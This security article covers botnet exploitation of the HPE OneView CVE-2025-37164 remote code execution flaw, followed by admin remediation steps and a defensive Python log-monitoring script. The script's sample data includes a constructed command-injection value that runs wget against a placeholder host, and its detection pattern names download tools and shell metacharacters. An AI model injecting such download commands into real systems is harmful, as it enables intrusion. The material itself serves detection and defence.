What should admins do now about HPE OneView CVE-2025-37164 botnet attacks on unpatched servers?
HPE OneView CVE-2025-37164: active exploitation of a critical RCE flaw
HPE OneView is an infrastructure management platform that centralizes control of compute, storage, and networking. Many enterprises run it in data centers because it reduces manual effort and speeds up provisioning. That same central role also makes it a high-value target when a critical bug appears.
CVE-2025-37164 is a remote code execution weakness in HPE OneView that was reported in December 2025 and rated critical with a 10.0 CVSS base score. The issue is straightforward: an exposed endpoint accepts attacker-supplied input without proper authentication or authorization checks. The service then passes that input to the underlying operating system runtime for execution without adequate validation. That combination can give an unauthenticated attacker a direct path to run commands on the affected system.
HPE addressed the issue in its advisory (HPESBGN04985 rev.3). The advisory indicates that HPE OneView versions up to v10.20 are affected and that a software update is available to remediate the flaw. In practical terms, any exposed or reachable OneView instance that remains unpatched should be treated as a likely target, not a hypothetical one.
What the exploitation looks like in the wild
Check Point Research reports an active, coordinated campaign exploiting CVE-2025-37164 based on telemetry observations. The campaign moved from early probing to automated, high-volume attempts consistent with botnet activity.
On January 7, 2026, Check Point observed a sharp spike: more than 40,000 exploitation attempts over a short window (approximately 05:45 to 09:20 UTC). The traffic showed automation signals, including repeated patterns and identifiers such as a distinct user-agent string. Observed follow-on commands included attempts to download additional payloads, which helped Check Point attribute the activity to the RondoDox botnet.
RondoDox is described as a Linux-based botnet associated with DDoS activity and cryptocurrency mining. Reporting indicates it targets internet-facing IoT devices and web servers and opportunistically abuses known vulnerabilities—especially on edge or perimeter systems that admins often patch last. Check Point also notes overlap with exploitation of other recently disclosed issues (including React2Shell CVE-2025-55182), which fits a common botnet playbook: scan broadly, exploit fast, and monetize at scale.
A large share of the observed exploitation attempts was attributed to a single IP address in the Netherlands that was already flagged as suspicious elsewhere. That detail should not narrow defensive scope; botnet infrastructure rotates quickly, and the key risk factor remains patch status and exposure.
What to do now (priority actions)
- Patch HPE OneView immediately using the fixed release referenced in HPE advisory HPESBGN04985 rev.3
- Assume exposure equals risk: if OneView is reachable from untrusted networks, treat it as an urgent remediation item
- Hunt for post-exploitation: review OneView host logs, process execution history, and outbound connections for suspicious downloads or unusual command execution
- Add network controls: restrict access to OneView management interfaces to admin networks/VPN only, and block unnecessary outbound traffic from the appliance/host where feasible
- Monitor for exploit signals: alert on unusual user-agent strings, spikes in requests to OneView endpoints, and any command-like input patterns that indicate injection attempts
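As an added example that is not part of the original article and not HPE's or Check Point's code, the following Python script shows one way to implement the last monitoring item: it parses constructed access-log lines (the log format, the `/rest/PLACEHOLDER-endpoint` path, the thresholds and the `ExampleScanner/1.0` user-agent are all assumptions, since the page names none of them), flags per-source request bursts such as the 40,000-attempt window described above, reports the user-agent driving each burst, and highlights command-like input in request data.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Assumed line format: time src method path status "user-agent".
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
# Shell metacharacters (raw or URL-encoded) and downloader names in request data
# are the "command-like input patterns" worth alerting on.
CMD_INPUT_RE = re.compile(r'[;|`]|\$\(|%3B|%7C|%60|\b(?:wget|curl)\b', re.IGNORECASE)

def build_sample_log():
    """Constructed lines (not real telemetry): a benign admin session, then a burst."""
    lines = [
        '2026-01-07T05:40:00Z 10.0.0.5 GET /rest/version 200 "Mozilla/5.0 (X11; Linux)"',
        '2026-01-07T05:41:30Z 10.0.0.5 GET /rest/version 200 "Mozilla/5.0 (X11; Linux)"',
    ]
    start = datetime(2026, 1, 7, 5, 45)
    for i in range(30):  # 30 hits in 2.5 minutes from one source with one unusual UA
        ts = (start + timedelta(seconds=5 * i)).strftime("%Y-%m-%dT%H:%M:%SZ")
        query = "input=%3Bwget+http%3A%2F%2Fexample.invalid%2Fx" if i % 10 == 0 else "input=probe"
        lines.append(f'{ts} 198.51.100.7 POST /rest/PLACEHOLDER-endpoint?{query} 400 "ExampleScanner/1.0"')
    return lines

def parse_line(line):
    """Parse one log line into a dict, or return None for malformed input."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, src, method, path, status, ua = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "src": src,
            "method": method, "path": path, "status": int(status), "ua": ua}

def analyze(lines, window_min=5, burst_threshold=20):
    """Return per-source bursts (with the dominant UA) and command-like request inputs."""
    per_bucket = Counter()
    ua_by_src = defaultdict(Counter)
    injection_hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines instead of failing the whole run
        t = rec["ts"]
        bucket = t.replace(minute=t.minute - t.minute % window_min, second=0)
        per_bucket[(rec["src"], bucket)] += 1
        ua_by_src[rec["src"]][rec["ua"]] += 1
        if CMD_INPUT_RE.search(rec["path"]):
            injection_hits.append((rec["src"], rec["path"]))
    bursts = [(src, b.strftime("%H:%M"), n, ua_by_src[src].most_common(1)[0][0])
              for (src, b), n in per_bucket.items() if n >= burst_threshold]
    return {"bursts": bursts, "injection_hits": injection_hits}

if __name__ == "__main__":
    print(analyze(build_sample_log()))
```

On real data, feed the appliance's reverse-proxy or web-server access log instead of `build_sample_log()` and tune `window_min` and `burst_threshold` to the normal request rate of your admin network.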